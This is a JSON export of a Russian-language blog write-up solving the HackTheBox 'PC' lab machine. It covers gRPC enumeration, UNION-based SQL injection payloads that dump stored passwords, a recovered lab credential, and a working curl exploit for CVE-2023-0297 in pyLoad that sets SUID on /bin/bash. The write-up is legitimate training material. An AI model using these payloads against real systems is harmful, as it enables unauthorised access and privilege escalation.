{"id":733,"date":"2023-10-07T19:00:00","date_gmt":"2023-10-07T16:00:00","guid":{"rendered":"https:\/\/seq.team\/?p=733"},"modified":"2025-12-02T15:16:09","modified_gmt":"2025-12-02T12:16:09","slug":"writeup-hackthebox-pc-easy","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/writeup-hackthebox-pc-easy\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox – PC (Easy)"},"content":{"rendered":"\n
\n
\n
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td>Easy<\/td><\/tr>
\u041e\u0421:<\/td>Linux<\/td><\/tr>
\u0411\u0430\u043b\u043b\u044b:<\/td>20<\/td><\/tr>
IP:<\/td>10.10.11.214<\/td><\/tr>
\u0422\u0435\u0433\u0438:<\/td>gRPC, SQLi, CVE-2023-0297, Linux PrivEsc<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n\n\n\n
<\/div>\n<\/div>\n\n\n\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n

\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441 gRPC, \u0438, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 grpcurl \u0438 grpcui<\/code> \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u0441 \u044d\u0442\u0438\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c. \u0414\u0430\u043b\u0435\u0435, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SQLi \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 id<\/code>, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e gRPC \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0423\u0417 sau<\/code> \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435, \u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u0441\u0435\u0440\u0432\u0438\u0441 pyLoad, \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u0443\u0435\u043c \u0435\u0433\u043e \u0434\u043e \u043c\u0430\u0448\u0438\u043d\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u0438, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e CVE-2023-0297 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c SUID \u043f\u0440\u0430\u0432\u0430 \u0432 \/bin\/bash, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0447\u0435\u0433\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/code>. <\/p>\n\n\n\n

\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n

\n

nmap -sS -p- 10.10.11.214<\/p>\n<\/blockquote>\n\n\n

\nPORT      STATE SERVICE\n22\/tcp    open  ssh\n50051\/tcp open  unknown\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: nmap -sVC -O -p22,50051 10.10.11.214<\/code><\/p>\n\n\n
\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)\n|   256 8486a6e204abdff71d456ccf395809de (ECDSA)\n|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)\n50051\/tcp open  unknown\n<\/pre><\/div>\n\n\n
\u041f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u043f\u043e \u043f\u043e\u0440\u0442\u0443 50051 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b \u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043c\u043e\u0447\u044c \u0432 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u0430. \u041f\u0440\u0438 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0430\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e \u043d\u0430 \u043f\u043e\u0440\u0442\u0435 50051 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u0441\u0435\u0440\u0432\u0438\u0441 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440 gRPC – \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u0430 REST API \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Google.<\/p>\n\n\n\n
\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f SimpleApp \u0438 SQL \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f<\/h3>\n\n\n\n
\u0414\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u0443\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 gRPC \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c grpcurl<\/code> \u0438 \u0432\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432:<\/p>\n\n\n\n
\n
grpcurl -plaintext 10.10.11.214:50051 list<\/code><\/p>\n<\/blockquote>\n\n\n
\nSimpleApp\ngrpc.reflection.v1alpha.ServerReflection\n<\/pre><\/div>\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u0432\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u043c\u043e\u0434\u0443\u043b\u0435\u0439, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u0430:<\/p>\n\n\n\n
\n
grpcurl -plaintext 10.10.11.214:50051 list SimpleApp<\/code><\/p>\n<\/blockquote>\n\n\n
\nSimpleApp.LoginUser\nSimpleApp.RegisterUser\nSimpleApp.getInfo\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u043c \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0438\u0437 \u043d\u0438\u0445 \u0431\u0435\u0437 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0438 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0432\u044b\u0432\u043e\u0434:<\/p>\n\n\n
\ngrpcurl -plaintext 10.10.11.214:50051 SimpleApp.getInfo \n{\n  "message": "Authorization Error.Missing 'token' header"\n}\n                                                                                                                                                                           \ngrpcurl -plaintext 10.10.11.214:50051 SimpleApp.LoginUser\n{\n  "message": "Login unsuccessful"\n}\n                                                                                                                                                                           \ngrpcurl -plaintext 10.10.11.214:50051 SimpleApp.RegisterUser\n{\n  "message": "username or password must be greater than 4"\n}\n<\/pre><\/div>\n\n\n
\u041c\u044b \u043c\u043e\u0436\u0435\u043c \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0438 \u0432\u044b\u0432\u0435\u0441\u0442\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435. \u0417\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c\u0441\u044f \u0441 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u043c\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0438 \u0432\u044b\u0432\u0435\u0434\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0435\u0431\u0435:<\/p>\n\n\n
\ngrpcurl -plaintext -d '{"username": "test123", "password": "test123"}' 10.10.11.214:50051 SimpleApp.RegisterUser \n{\n  "message": "Account created for user test123!"\n}\n\ngrpcurl -plaintext -d '{"username": "test123", "password": "test123"}' 10.10.11.214:50051 SimpleApp.LoginUser\n{\n  "message": "Your id is 694."\n}\n<\/pre><\/div>\n\n\n
\u0414\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0433\u043e \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0435\u0449\u0451 \u043e\u0434\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043f\u043e gRPC – grpcui<\/code>.<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441 \u0440\u0430\u043d\u0435\u0435 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0423\u0417 \u0443\u0431\u0435\u0434\u0438\u043b\u0438\u0441\u044c, \u0447\u0442\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432\u0435\u0440\u043d\u043e \u0438 \u0432\u044b\u0432\u043e\u0434 \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043c \u0441 \u0440\u0430\u043d\u0435\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u0432 grpcurl<\/code>:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u043c \u0437\u0430\u043f\u0440\u043e\u0441, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0439 \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e BurpSuite \u0438 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0443\u0435\u043c \u0435\u0433\u043e:<\/p>\n\n\n
\nPOST \/invoke\/SimpleApp.getInfo HTTP\/1.1\nHost: 127.0.0.1:45154\n[...]\n\n{\n  "metadata":[\n   {\n"name":"token",\n"value":"b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdDEyMyIsImV4cCI6MTY5NjUxNDU1Mn0.4-m6Z-zmAMO4ckdOrCtgeqreDHvVbLuBA8PFU3B_O4I'"\n   }\n  ],\n  "data":[\n   {\n    "id":"694"\n   }\n  ]\n}\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043e\u0442\u0432\u0435\u0442:<\/p>\n\n\n
\nHTTP\/1.1 200 OK\n[...]\n\n{\n   "headers":[\n   ],\n   "error":{\n      "code":2,\n      "name":"Unknown",\n      "message":"Unexpected \\u003cclass 'TypeError'\\u003e: 'NoneType' object is not subscriptable",\n      "details":[\n      ]\n   },\n   "responses":null,\n   "requests":{\n      "total":1,\n      "sent":1\n   },\n   "trailers":[\n      {\n      "name":"content-type",\n      "value":"application\/grpc"\n      }\n   ]\n}\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u0443\u0435\u043c \u043d\u0430\u043b\u0438\u0447\u0438\u0435 SQLi \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 id<\/code>:<\/p>\n\n\n
\nPOST \/invoke\/SimpleApp.getInfo HTTP\/1.1\nHost: 127.0.0.1:45154\n[...]\n\n{\n  "metadata":[\n   {\n"name":"token",\n"value":"b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdDEyMyIsImV4cCI6MTY5NjUxNDU1Mn0.4-m6Z-zmAMO4ckdOrCtgeqreDHvVbLuBA8PFU3B_O4I'"\n   }\n  ],\n  "data":[\n   {\n    "id":"694 AND 1=1"\n   }\n  ]\n}\n<\/pre><\/div>\n\n\n
\u041f\u0440\u0438\u0448\u0451\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043e\u0442\u0432\u0435\u0442 \u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430:<\/p>\n\n\n
\nHTTP\/1.1 200 OK\n[...]\n\n{\n   "headers":[\n   ],\n   "error":{\n      "code":2,\n      "name":"Unknown",\n      "message":"Will update soon.",\n      "details":[\n      ]\n   },\n   "responses":null,\n   "requests":{\n      "total":1,\n      "sent":1\n   },\n   "trailers":[\n      {\n      "name":"content-type",\n      "value":"application\/grpc"\n      }\n   ]\n}\n<\/pre><\/div>\n\n\n
\u041f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0439 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 id<\/code> \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0423\u0417 sau<\/code>:<\/p>\n\n\n
\n694 union SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'\n\n694 union SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='accounts'\nCREATE TABLE "accounts" (username TEXT UNIQUE,password TEXT)\n\n694 union SELECT GROUP_CONCAT(username) from accounts\n\n694 union SELECT GROUP_CONCAT(password) from accounts\n<\/pre><\/div>\n\n\n
\u0423\u0447\u0451\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435: sau:HereIsYourPassWord1431<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0423\u0441\u043f\u0435\u0448\u043d\u043e \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f sau<\/code>.<\/p>\n\n\n\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/h3>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b netstat -tulpn<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u0440\u043e\u043a\u0441\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442 8000 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000 -N<\/code><\/p>\n\n\n\n
\u0418\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441, \u043d\u0430\u0445\u043e\u0434\u044f\u0449\u0438\u0439\u0441\u044f \u043d\u0430 \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u043f\u043e\u0440\u0442\u0435 8000:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u043e\u043b\u0433\u043e\u0433\u043e \u043f\u043e\u0438\u0441\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 pyLoad \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2023-0297, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 \u0431\u0435\u0437 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0441\u0435\u0440\u0432\u0438\u0441 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:<\/p>\n\n\n
\ncurl -i -s -k -X 'POST' --data-binary 'jk=pyimport%20os;os.system("chmod%20u%2Bs%20%2Fbin%2Fbash");\nf=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaaa' 'http:\/\/127.0.0.1:8000\/flash\/addcrypted2'\n<\/pre><\/div>\n\n\n
\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e RCE \u043c\u044b \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c SUID \u043f\u0440\u0430\u0432\u0430 \u0432 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043c\u043e\u043c \/bin\/bash, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0435\u0433\u043e \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0412\u044b\u043f\u043e\u043b\u043d\u0438\u043c bash \u043e\u0442 root \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u043c \u0441\u0432\u043e\u0438 \u043f\u0440\u0430\u0432\u0430:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root!<\/p>\n\n\n\n
\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n
https:\/\/cloud.yandex.ru\/docs\/glossary\/grpc<\/a><\/p>\n\n\n\n
https:\/\/github.com\/fullstorydev\/grpcurl<\/a><\/p>\n\n\n\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/sql-injection<\/a><\/p>\n\n\n\n
https:\/\/github.com\/bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Easy \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 20 IP: 10.10.11.214 \u0422\u0435\u0433\u0438: gRPC, SQLi, CVE-2023-0297, Linux PrivEsc \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441 gRPC, \u0438, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 grpcurl \u0438 grpcui \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u0441 \u044d\u0442\u0438\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c. \u0414\u0430\u043b\u0435\u0435, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SQLi \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 id, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e gRPC \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0423\u0417 sau \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435, […]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-733","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=733"}],"version-history":[{"count":17,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/733\/revisions"}],"predecessor-version":[{"id":759,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/733\/revisions\/759"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}